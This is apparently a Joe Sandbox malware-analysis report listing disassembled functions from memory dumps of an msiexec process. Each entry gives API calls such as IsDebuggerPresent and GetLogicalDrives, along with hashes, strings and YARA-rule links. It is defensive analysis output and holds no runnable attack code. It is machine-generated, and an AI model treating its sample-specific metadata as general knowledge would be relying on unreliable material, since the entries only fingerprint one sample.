                                                                                                                                                                                                                                • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 415426439-0
                                                                                                                                                                                                                                • Opcode ID: 1bf9210f47e7a048a8bb1c304c77f68ca15b5033aad5db98d59927cc93dff0cb
                                                                                                                                                                                                                                • Instruction ID: b8ca9751b5296978ec14818883ed886fd6af301b4df57af5f7d99d060dab121b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bf9210f47e7a048a8bb1c304c77f68ca15b5033aad5db98d59927cc93dff0cb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15516D71E04205ABDF90DFA5EC85ABF77B8AF48701F048569E911E7194EB709A40CB70
                                                                                                                                                                                                                                Function 0619B120 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 254COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: GetLastError.KERNEL32(00000000,?,06197EDD), ref: 06192AC3
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: SetLastError.KERNEL32(00000000,00000000,?,0000000B,000000FF), ref: 06192B65
                                                                                                                                                                                                                                • GetACP.KERNEL32(?,?,?,?,?,?,06190D81,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0619B1DF
                                                                                                                                                                                                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,06190D81,?,?,?,00000055,?,-00000050,?,?), ref: 0619B216
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0619B379
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                                                                                                                                                • String ID: utf8
                                                                                                                                                                                                                                • API String ID: 607553120-905460609
                                                                                                                                                                                                                                • Opcode ID: bf291484189bcc384ac58410db24bb6b68bb825ea36d39b943c2c62485af19ed
                                                                                                                                                                                                                                • Instruction ID: bd35a5b1c6b67ef7d01c5da16d4284fce9e815df7de2706af2c1e384232027b6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf291484189bcc384ac58410db24bb6b68bb825ea36d39b943c2c62485af19ed
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6371A171A08606AAEFA4EB75AC45BAB73B8EF45700F14442AE915D7180EB70AA40C7B1
                                                                                                                                                                                                                                Function 00316F70 Relevance: 6.9, Strings: 5, Instructions: 625COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID: InA>$InA>$f$wew${ew
                                                                                                                                                                                                                                • API String ID: 2994545307-1519385565
                                                                                                                                                                                                                                • Opcode ID: 221ed05757e9d0e7daf96dc81957e2fdba44cae0a55a650815139e499a4ffee5
                                                                                                                                                                                                                                • Instruction ID: b35aff28f45164880fdc236b40c35cf1c95306612dd60b6800b1b90887a71ff2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 221ed05757e9d0e7daf96dc81957e2fdba44cae0a55a650815139e499a4ffee5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6222BD7060C3419FD71ACF29C890BABBBF6AF8D314F19892DE4948B291D774D885CB52
                                                                                                                                                                                                                                Function 002FCAB0 Relevance: 6.8, Strings: 5, Instructions: 509COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: ijk$.y-{$1I.K$WC$xz
                                                                                                                                                                                                                                • API String ID: 0-1156112397
                                                                                                                                                                                                                                • Opcode ID: 739ccdd039c597cbac7a56bf62e2ba615238823e380db533b386add3f4d37ef0
                                                                                                                                                                                                                                • Instruction ID: 35dc9a45df00e79ae1f5e611e92301e29b0588d9a49e2c9e295f1a89faf143d3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 739ccdd039c597cbac7a56bf62e2ba615238823e380db533b386add3f4d37ef0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01D125715183098BD724DF24C99226BFBE2FFD1354F288A2CE5D68B394E7749805CB92
                                                                                                                                                                                                                                Function 003053D4 Relevance: 6.7, Strings: 5, Instructions: 421COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: (P%h$*)S!$4DNt$J*:J$wr
                                                                                                                                                                                                                                • API String ID: 0-3493672791
                                                                                                                                                                                                                                • Opcode ID: 6842bbef4fe36bfca3d108e6f5cde4eb7e6fa1c1b1bd85543619f3b9e7ad33ec
                                                                                                                                                                                                                                • Instruction ID: fd26a7df42ad0768ef02acca5e4e84905da2d07840b8dc7b8e677295d2d24632
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6842bbef4fe36bfca3d108e6f5cde4eb7e6fa1c1b1bd85543619f3b9e7ad33ec
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47C12171608344CFD716CF29DC5176BBBE6EB99304F558A2CF498872E2E731D90A8B12
                                                                                                                                                                                                                                Function 002F0A63 Relevance: 6.7, Strings: 5, Instructions: 405COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: &$2$5$;$[
                                                                                                                                                                                                                                • API String ID: 0-2866879556
                                                                                                                                                                                                                                • Opcode ID: 47cc63ead8d4b43c1642e8686946a7e5134fadbb1ab89ec98b0484d99b260c98
                                                                                                                                                                                                                                • Instruction ID: 290db6ff23e461ed4d46f1a4760975d78277b7f3c5b5619ccc2123c85b3bc739
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47cc63ead8d4b43c1642e8686946a7e5134fadbb1ab89ec98b0484d99b260c98
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51F1157262C7808BC7249B38C4943BFFBD1ABD5364F194A3DD5EA873C2DA7489518B42
                                                                                                                                                                                                                                Function 002F4420 Relevance: 6.4, Strings: 5, Instructions: 177COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 2$9$=:;8$gfff$t%cz
                                                                                                                                                                                                                                • API String ID: 0-4196543367
                                                                                                                                                                                                                                • Opcode ID: 51cc1df3cf2dc26d794bc7073fa2963e2d303df2cb2bc9224ca7640017990b05
                                                                                                                                                                                                                                • Instruction ID: bef0b2e451dd4ce03dbeb71aafd01c8757f2c11609b75f42899372fa0b7e6e67
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51cc1df3cf2dc26d794bc7073fa2963e2d303df2cb2bc9224ca7640017990b05
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74518C726202058FD328DF29DC617BBB6DBABC5314F68C23DD546CB2A5EBB49811CB41
                                                                                                                                                                                                                                Function 06188BA5 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 06188BB1
                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 06188C7D
                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 06188C96
                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 06188CA0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 254469556-0
                                                                                                                                                                                                                                • Opcode ID: ce3e6a327ffeb9858071acd2b0ce27b29d5402388a7910d43eadd6b1b792c062
                                                                                                                                                                                                                                • Instruction ID: df0d5885954224a2dbffe0333bae99b1fcbe6fedd7e0739528a554ba5b87287f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce3e6a327ffeb9858071acd2b0ce27b29d5402388a7910d43eadd6b1b792c062
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05310A75D012189BDFA1EF64DD497CDBBB8BF08300F1041AAE90DAB240E7709A85CF45
                                                                                                                                                                                                                                Function 002F35B0 Relevance: 5.7, Strings: 4, Instructions: 682COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: =:;8$=== $t%cz$t%cz
                                                                                                                                                                                                                                • API String ID: 0-3208557946
                                                                                                                                                                                                                                • Opcode ID: 3f7fed079f72b57a0418bdc1d8b45f8fe986b471e5e130ebeb6a5a660c45786c
                                                                                                                                                                                                                                • Instruction ID: cdad2a3a307618a01c63492f22e6e2dd631f94879aa30c814029464f9d561041
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f7fed079f72b57a0418bdc1d8b45f8fe986b471e5e130ebeb6a5a660c45786c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC1243B15193419BE335DF24DC91BBBB3E5EF89354F04492CE5C98B291EB309A21CB92
                                                                                                                                                                                                                                Function 002FF728 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 379COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DrivesLogical
                                                                                                                                                                                                                                • String ID: W)$_Q
                                                                                                                                                                                                                                • API String ID: 999431828-872021665
                                                                                                                                                                                                                                • Opcode ID: 17a49515933ffb85f5d20c50a344e8b75a0c216392691b60967c67954f072a60
                                                                                                                                                                                                                                • Instruction ID: ea4a35143da6d20039df54b4de455ecc83a39117867dd331ae976cac6ca8da69
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17a49515933ffb85f5d20c50a344e8b75a0c216392691b60967c67954f072a60
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97D126B5910700CFDB28CF24D9922AABBB1FF46314F19996CD9869F755D738A902CF80
                                                                                                                                                                                                                                Function 00307CAB Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 330COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                • String ID: ;BG9$OO5H
                                                                                                                                                                                                                                • API String ID: 3664257935-3586822885
                                                                                                                                                                                                                                • Opcode ID: 00a51157d01cb0203fe63702af4f4ca2a713da692025affa4d0844efc32a884b
                                                                                                                                                                                                                                • Instruction ID: 572ce8ea2bbd9433c17cd6ff9a056c1d2f10b496198feec9e8fc5c089c1a8ad8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00a51157d01cb0203fe63702af4f4ca2a713da692025affa4d0844efc32a884b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CCA13A71A457428BE3268F38C8617B2BBD2EFA5310F298A6CD5D64B3D2D7357805C750
                                                                                                                                                                                                                                Function 00302740 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 244COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: HX$bom
                                                                                                                                                                                                                                • API String ID: 0-2027550097
                                                                                                                                                                                                                                • Opcode ID: aae5d59c45628da62b4ffcd7c527abb7c3e2f9e47ff66f1204353d94888533fe
                                                                                                                                                                                                                                • Instruction ID: 39cbfb7a6748758cb97f28c57beb187fded410fc8884487ac6d38dd3c378675b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aae5d59c45628da62b4ffcd7c527abb7c3e2f9e47ff66f1204353d94888533fe
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B91EFB56093808BD320DF21E85426BBBF5FFC1744F44992CE4C59B291D7798A0ACB93
                                                                                                                                                                                                                                Function 0030E145 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MetricsSystem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                • Opcode ID: dc0ca21927f99ed296eea28af1a4b111ccbc57111b2445a7be7f05f7e3567a00
                                                                                                                                                                                                                                • Instruction ID: e6571dd310b6ed78139a63d481941f4ba4b8426e43f350553f51784caebfcf6f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc0ca21927f99ed296eea28af1a4b111ccbc57111b2445a7be7f05f7e3567a00
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75414BB49187408FD750EF68E98565AFBF0BF88304F11892EE998C7364D774A948CF82
                                                                                                                                                                                                                                Function 003081D4 Relevance: 5.2, Strings: 4, Instructions: 239COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: ]ks$^FHn$^FHn$f@~-
                                                                                                                                                                                                                                • API String ID: 0-266902593
                                                                                                                                                                                                                                • Opcode ID: 0235a8d27baa008b3143cec70d61bae3b29c72a0981db2c3d29fafbb197ec960
                                                                                                                                                                                                                                • Instruction ID: d56d589da91237707260d86915a2a03547da22aba22615977a5f738b7114480e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0235a8d27baa008b3143cec70d61bae3b29c72a0981db2c3d29fafbb197ec960
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1761D8B0109B818FD3268B3584703E3BFD59FA3305F1989ACC2E65B283DB79590B8B55
                                                                                                                                                                                                                                Function 0619B53D Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: GetLastError.KERNEL32(00000000,?,06197EDD), ref: 06192AC3
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: SetLastError.KERNEL32(00000000,00000000,?,0000000B,000000FF), ref: 06192B65
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0619B591
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0619B5DB
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0619B6A1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
